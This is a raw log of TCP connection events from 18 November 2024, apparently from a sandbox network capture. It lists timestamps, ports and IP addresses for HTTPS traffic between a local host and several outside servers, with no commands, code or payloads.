                                          Nov 18, 2024 23:43:52.384207010 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.083287001 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.088787079 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.132267952 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.135160923 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.191817999 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.191852093 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.191883087 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.191894054 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.192796946 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.192866087 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.195662975 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.195725918 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.196613073 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.196681976 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.196784973 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.196806908 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.196863890 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.197051048 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.238758087 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.238765955 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.238770008 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.285264015 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.643064022 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.643117905 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.643217087 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.643260956 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.643290997 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.643332958 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.643372059 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.644051075 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.644083977 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.719332933 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.719429016 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.719540119 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.719794989 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.719831944 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.720475912 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.720544100 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.720606089 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.720715046 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.720760107 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.720880032 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.720906019 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.721013069 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.721043110 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.721071005 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.721071005 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.721081018 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.721092939 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:53.721113920 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:53.721127033 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.407793999 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.408126116 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.408186913 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.408683062 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.409049034 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.409141064 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.457921028 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.466118097 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:54.466173887 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:54.466236115 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:54.466470003 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:54.466502905 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:54.692289114 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.692679882 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.692745924 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.693703890 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.693722010 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.711718082 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.722131014 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:54.722157001 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:54.722233057 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:54.722479105 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:54.722491980 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:54.755359888 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.882550955 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.882580042 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.882590055 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.882632971 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:54.882652998 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:54.928177118 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.002547026 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.002558947 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.002608061 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.002744913 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.002744913 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.002839088 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.002849102 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.002897978 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.003950119 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.003959894 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.004019976 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.034131050 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.034146070 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.034260988 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.121819019 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.121833086 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.121901989 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.122518063 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.122587919 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.123187065 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.123253107 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.124166965 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.124241114 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.125194073 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.125272036 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.126234055 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.126311064 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.154081106 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.154175997 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.181265116 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:55.181369066 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:55.181466103 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:55.183031082 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:55.183079958 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:55.202758074 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.202819109 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.202846050 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.202877998 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.203263998 CET49739443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.203300953 CET44349739192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.330596924 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:55.331336021 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:55.331374884 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:55.332968950 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:55.333045959 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:55.333945036 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:55.334039927 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:55.379475117 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:55.379508018 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:43:55.425582886 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:43:55.497739077 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.497854948 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.497977972 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.498159885 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.498253107 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.498322010 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.498450994 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.498488903 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.498595953 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:55.498631001 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:55.572419882 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.611807108 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:55.611824036 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.615603924 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.615727901 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:55.690360069 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:55.690469027 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:55.690475941 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.690572023 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.744411945 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:55.744441986 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:55.790851116 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052544117 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052577019 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052586079 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052634954 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052649975 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052695036 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052720070 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052751064 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.052767992 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052768946 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052768946 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052768946 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.052805901 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.054708958 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.054733038 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.054765940 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.054774046 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.054805994 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.054821968 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.090365887 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.090446949 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.094213009 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.094228029 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.094578028 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.137672901 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.169500113 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169557095 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169569016 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.169585943 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169611931 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.169631004 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.169666052 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169723034 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.169728994 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169836998 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.169883013 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.170696020 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.170715094 CET4434974113.35.58.71192.168.2.4
                                          Nov 18, 2024 23:43:56.170727968 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.170758009 CET49741443192.168.2.413.35.58.71
                                          Nov 18, 2024 23:43:56.183360100 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.187221050 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.187289953 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.187422991 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.187491894 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.187527895 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.187566996 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.188424110 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.188478947 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.189265966 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.189335108 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.190352917 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.190368891 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.191237926 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.191310883 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.191785097 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.191965103 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.192653894 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:56.192701101 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:56.192754030 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:56.192953110 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:56.192969084 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:56.205837011 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:56.205898046 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:56.205980062 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:56.206481934 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:56.206511974 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:56.236880064 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.236968994 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.237030983 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.237150908 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.237996101 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.238020897 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.240107059 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.240148067 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.240752935 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:56.240808010 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:56.240869045 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:56.241436005 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241534948 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241537094 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.241585970 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.241605043 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241641998 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241705894 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241735935 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.241791964 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241825104 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241844893 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.241902113 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.241986036 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:56.242016077 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:56.242254972 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.242290974 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.242383003 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.242420912 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.242496014 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.242506981 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.242619991 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.242644072 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.278366089 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.319688082 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.319744110 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.319816113 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.321470022 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.321492910 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.357748985 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.357770920 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.357778072 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.357835054 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.357892990 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.388542891 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.388750076 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.388750076 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.388781071 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.388838053 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.388854027 CET49742443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.388885021 CET44349742184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.409836054 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.437046051 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.437105894 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.437192917 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.437649012 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:56.437676907 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:56.474735975 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.474747896 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.474806070 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.474839926 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.474867105 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.475883007 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.475889921 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.475953102 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.476777077 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.476783991 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.476836920 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.491868019 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.491878033 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.491938114 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.592298031 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.592308044 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.592360973 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.592472076 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.592536926 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.593302011 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.593367100 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.593934059 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.593997002 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.594893932 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.594959021 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.608520031 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.608593941 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.654351950 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.654437065 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.708403111 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.708468914 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.708483934 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.708543062 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.708806992 CET49743443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:56.708859921 CET44349743192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:56.975305080 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.979130030 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.979177952 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.980626106 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.980787039 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.982888937 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.983042955 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.983297110 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.983338118 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.983448029 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.983458042 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.983822107 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.984410048 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.984457016 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.985045910 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.985244989 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.985291004 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.986207962 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.986224890 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.986309052 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.986310005 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.986485958 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.986543894 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.987083912 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.987164974 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.987922907 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.988007069 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.988048077 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.988143921 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.988214970 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.988223076 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.988255024 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.988265038 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.988301992 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.989207983 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.989465952 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.989530087 CET4434974713.107.246.45192.168.2.4
